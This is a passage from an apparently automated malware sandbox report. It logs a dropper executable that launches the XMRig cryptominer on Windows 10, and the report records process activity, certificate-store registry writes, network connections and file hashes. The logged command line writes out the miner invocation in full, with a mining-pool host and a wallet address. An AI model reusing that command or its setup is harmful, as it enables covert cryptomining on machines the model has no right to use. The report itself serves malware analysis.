memory/1868-52-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-53-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-54-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-55-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-56-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-57-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-58-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-59-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-60-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-61-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-62-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-63-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-64-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-65-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-66-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-67-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-68-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-69-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-70-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-71-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-72-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-73-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-74-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-75-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-76-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-77-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-78-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-79-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-80-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-81-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-82-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-83-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-84-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:27
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4156 wrote to memory of 3572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4156 wrote to memory of 3572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3572-16-0x000001804DDB0000-0x000001804DDD0000-memory.dmp
memory/3572-17-0x000001804F6B0000-0x000001804F6D0000-memory.dmp
memory/3572-18-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-20-0x000001804F6F0000-0x000001804F710000-memory.dmp
memory/3572-19-0x000001804F6D0000-0x000001804F6F0000-memory.dmp
memory/3572-21-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-22-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-25-0x000001804F6F0000-0x000001804F710000-memory.dmp
memory/3572-24-0x000001804F6D0000-0x000001804F6F0000-memory.dmp
memory/3572-23-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-26-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-27-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-28-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-29-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-30-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-31-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-32-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-33-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-34-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-35-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-36-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-37-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-38-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-39-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-40-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-41-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-42-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-43-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-44-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-45-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-46-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-47-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-48-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-49-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-50-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-51-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-52-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-53-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-54-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-55-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-56-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-57-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-58-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-59-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-60-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-61-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-62-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-63-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-64-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-65-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-66-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-67-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-68-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-69-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-70-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-71-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-72-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-73-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-74-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-75-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-76-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-77-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-78-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-79-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-80-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-81-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-82-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-83-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-84-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 856 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 856 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2364,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=1408 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.246.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2672-16-0x0000021FF4050000-0x0000021FF4070000-memory.dmp
memory/2672-17-0x0000021FF40A0000-0x0000021FF40C0000-memory.dmp
memory/2672-18-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-20-0x0000021FF40C0000-0x0000021FF40E0000-memory.dmp
memory/2672-19-0x0000021FF40E0000-0x0000021FF4100000-memory.dmp
memory/2672-21-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-22-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-25-0x0000021FF40C0000-0x0000021FF40E0000-memory.dmp
memory/2672-24-0x0000021FF40E0000-0x0000021FF4100000-memory.dmp
memory/2672-23-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-26-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-27-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-28-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-29-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-30-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-31-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-32-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-33-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-34-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-35-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-36-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-37-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-38-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-39-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-40-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-41-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-42-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-43-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-44-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-45-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-46-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-47-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-48-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-49-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-50-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-51-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-52-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-53-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-54-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-55-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-56-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-57-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-58-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-59-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-60-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-61-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-62-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-63-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-64-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-65-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-66-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-67-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-68-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-69-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-70-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-71-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-72-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-73-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-74-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-75-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-76-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-77-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-78-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-79-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-80-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-81-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-82-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-83-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-84-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:31
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1790s
Command Line
Signatures
